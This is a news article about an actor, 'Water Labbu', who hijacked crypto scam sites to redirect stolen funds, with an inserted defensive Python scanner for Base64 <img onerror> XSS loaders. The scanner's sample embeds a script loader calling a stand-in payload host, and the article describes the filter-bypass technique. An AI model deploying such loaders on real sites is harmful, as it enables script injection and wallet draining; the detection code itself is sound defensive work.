Cryptocurrency scammers fight each other over stolen funds

Cybersecurity researchers have discovered a hacker who compromised cryptocurrency scam sites and diverted already-stolen funds to his own wallets, and who has already raised hundreds of thousands of dollars this way.

According to Trend Micro, a malicious actor named "Water Labbu" found and hacked 45 fraudulent websites and replaced their wallet addresses with his own. This way, all the funds that scammers trick people into handing over would actually go to him.

The scam sites are mostly fake liquidity mining pools. Genuine liquidity pools work by having people lend their crypto to decentralized exchanges, which pool it. The liquidity pool lets crypto traders swap their tokens directly (in a decentralized way, as opposed to a centralized model where a single entity provides the liquidity). Lenders make a profit by receiving a share of the transaction fees.

Fake sites, fake apps

In order to lend their cryptocurrencies, users must connect their wallets to the liquidity mining pool. Fake sites, on the other hand, simply wait for people to connect their wallets and then empty them. Between building fake apps and running social media campaigns to promote the scam, there is a lot of work involved. Water Labbu bypasses all of this, letting the original scammers do the heavy lifting for him.

Trend Micro claims that the scammer has so far obtained more than €300,000 from nine identified victims.

"In one of the cases we analyzed, Water Labbu injected an IMG tag to load a Base64-encoded JavaScript payload using the 'onerror' event, in what is known as an IMG XSS Bypass technique, to bypass Cross-Site Scripting (XSS) filters," Trend Micro explains in its report. "The injected payload then creates another script element that loads another script from the tmpmetacom delivery server."
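As a defender-side illustration of the injection pattern quoted above (added here, not code from the Trend Micro report), the following scanner flags `<img>` tags whose `onerror` handler decodes and executes a Base64 payload, and decodes any embedded literal to check whether it builds a script loader. The sample page, loader script and domain are constructed for the example.

```python
"""Flag <img onerror=...> handlers that decode and run a Base64 payload."""
import base64
import re
from html.parser import HTMLParser

# Handler fragments that indicate decode-and-execute, not a cosmetic image fallback.
SUSPICIOUS_CALLS = ("atob(", "eval(", "Function(", "createElement(", "document.write(")
# Quoted Base64-looking literal of useful length inside the handler.
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{16,}={0,2})['\"]")


class ImgHandlerScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "img":
            return
        attr_map = {k.lower(): (v or "") for k, v in attrs}
        handler = attr_map.get("onerror")
        if handler is None:
            return
        hits = [c for c in SUSPICIOUS_CALLS if c in handler]
        decoded = ""
        for literal in B64_LITERAL.findall(handler):
            try:
                decoded = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
            except (ValueError, UnicodeDecodeError):
                continue
            # A decoded payload that creates a <script> element is the loader stage.
            if "createElement" in decoded or "<script" in decoded.lower():
                hits.append("base64:script-loader")
        if hits:
            self.findings.append({"src": attr_map.get("src", ""), "handler": handler,
                                  "indicators": hits, "decoded": decoded})


def scan_html(html: str) -> list:
    """Return one finding per suspicious <img onerror> handler in the page."""
    scanner = ImgHandlerScanner()
    scanner.feed(html)
    return scanner.findings


# Constructed sample page: one benign image fallback, one injected loader (hypothetical domain).
LOADER_JS = ("var s=document.createElement('script');"
             "s.src='https://payload.example.invalid/x.js';document.head.appendChild(s);")
SAMPLE_HTML = ('<img src="/logo.png" onerror="this.style.display=\'none\'">'
               '<img src=x onerror="eval(atob(\'%s\'))">'
               % base64.b64encode(LOADER_JS.encode()).decode())

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding["indicators"], finding["decoded"][:60])
```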

The script looks for newly connected wallets holding at least 0.005 ETH or 22 USDT and, depending on the platform (Windows or one of the two mobile platforms), initiates the transfer.

To protect against these types of scams, Trend Micro warns that users should be very careful when connecting their wallets and make sure they have done their due diligence before handing over their tokens.

Via: BleepingComputer